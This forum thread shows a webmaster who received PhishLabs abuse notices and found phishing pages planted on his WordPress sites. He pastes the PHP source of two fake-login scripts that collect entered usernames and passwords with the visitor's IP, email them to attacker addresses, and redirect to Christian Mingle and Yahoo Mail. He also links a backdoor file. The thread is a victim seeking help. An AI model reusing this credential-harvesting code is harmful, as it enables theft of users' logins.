Phishlabs? Who are they?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • hausarzt
    Confirmed User
    • Jan 2011
    • 818

    #1

    Phishlabs? Who are they?

    I receive strange emails in the past for almost every of my sites:

    Our company investigates computer crime incidents on behalf of banks and other companies.

    We have discovered that your web site, hottiescam.com, has been attacked by criminals. These criminals created a fake web page which appears to copy a Spark Networks site.


    http:// my website .com/services/mchsvjbsuvkjn.html



    If possible, please provide the following information to assist our investigation:

    - Web server and FTP server log files for the past several days
    - Copies of all phishing files, hack tools, or other hacker files

    Finally, we kindly request that you disable or remove the phishing files as soon as possible.

    We recommend taking the following actions to secure the web site and prevent the attackers from returning:

    - Change your web hosting password
    - Update your web applications including CMS, blog, ecommerce, and other applications (and all add-on modules/components/plugins)
    - Search all of your web directories for suspicious files and investigate any found
    - Scan the computer from which you login to your web hosting control panel or ftp server with anti-virus software

    If you believe we have contacted you in error, or if we can provide any assistance with this incident, please contact us and let us know.

    Thank you for your assistance with this matter,

    Eric George
    PhishLabs Security Operations
    [email protected]
    +1.202.386.6001
    http://www.phishlabs.com


    Another one through my abuse contact from my hosting:

    Our company investigates computer crime incidents on behalf of banks and other companies.

    We have discovered that your web site, www.dirtycamsluts.com, has been attacked by criminals. These criminals created a fake web page which appears to copy a Spark Networks site.


    hXXp www [dot] MY WEBSITE [dot] com/jimjim/mchsvjbsuvkjn [dot] html
    hXXp www [dot] MY WEBSITE [dot] com/jimjim/login [dot] php



    If possible, please provide the following information to assist our investigation:

    - Web server and FTP server log files for the past several days
    - Copies of all phishing files, hack tools, or other hacker files

    Finally, we kindly request that you disable or remove the phishing files as soon as possible.

    We recommend taking the following actions to secure the web site and prevent the attackers from returning:

    - Change your web hosting password
    - Update your web applications including CMS, blog, ecommerce, and other applications (and all add-on modules/components/plugins)
    - Search all of your web directories for suspicious files and investigate any found
    - Scan the computer from which you login to your web hosting control panel or ftp server with anti-virus software

    If you believe we have contacted you in error, or if we can provide any assistance with this incident, please contact us and let us know.

    Thank you for your assistance with this matter,

    Matt Twitty
    PhishLabs Security Operations
    [email protected]
    +1.202.386.6001
    http://www.phishlabs.com
    Sites are running on wordpress. I just checked the sites and found some strange folders in some installs, so I deleted them. Anyone else has this "problem"?
    I know, my english is bad. But your german might be even worse
  • j3rkules
    VIP
    • Jul 2013
    • 22111

    #2
    Never heard of them.

    Comment

    • hausarzt
      Confirmed User
      • Jan 2011
      • 818

      #3
      Alright, now google webmaster tool told me, that my sites are reported as phising sites.

      I removed all suspicious files/folder from my sites.


      A file called buff.php contained this:

      http://pastebin.com/jJ3QS7UH
      READ AT YOUR OWN RISK

      My Avast goes wild on this file. Can anyone read/translate this?

      Some fake-login php-files:

      <?php
      $ip = getenv("REMOTE_ADDR");
      $data=date("D M d, Y g:i a");
      $message .= "User: ".$_POST['loginemail']."\n";
      $message .= "PassWord: " .$_POST['password']."\n";
      $message .= "Country: $ip\n";
      $message .= "Date: $data\n";

      $recipient = "[email protected]";
      $subject = "Christian Mingle | $ip";
      $headers = "From: Rashyd Bohaty <[email protected]>";
      $headers .= $_POST['eMailAdd']."\n";
      $headers .= "MIME-Version: 1.0\n";
      mail($recipient,$subject,$message,$headers);

      header("Location: http://www.christianmingle.com/");
      ?>
      <?php
      $ip = getenv("REMOTE_ADDR");

      $data=date("D M d, Y g:i a");
      $message .= "====== Hacked By OBO ======\n";
      $message .= "User: ".$_POST['username']."\n";
      $message .= "PassWord: " .$_POST['passwd']."\n";
      $message .= "Country: $ip\n";
      $message .= "Date: $data\n";
      $message .= "====== ® Trademark 2015 ======\n";

      $recipient = "[email protected]";
      $recipient2 = "[email protected]";
      $subject = "Y!Logs $ip";
      $headers = "From: Rashyd Bohaty <[email protected]>";
      $headers .= $_POST['eMailAdd']."\n";
      $headers .= "MIME-Version: 1.0\n";
      mail($recipient,$subject,$message,$headers);
      mail($recipient2,$subject,$message,$headers);
      header("Location: http://www.yahoomail.com");

      ?>
      I know, my english is bad. But your german might be even worse

      Comment

      • MrGusMuller
        Confirmed User
        • Oct 2010
        • 1262

        #4
        it was sending the user/password to the hackers' email :/
        change them all!!
        StagCMS - Adult CMS - user friendly adult content management system - speed up your websites with no SQL connections
        ICQ: 63*23*43*113

        Comment

        • MrGusMuller
          Confirmed User
          • Oct 2010
          • 1262

          #5
          try Sucuri Security ? WAF, DDoS Protection, Malware Removal, WordPress Security, and Blacklist Removal
          they have helped some friends...
          StagCMS - Adult CMS - user friendly adult content management system - speed up your websites with no SQL connections
          ICQ: 63*23*43*113

          Comment

          Working...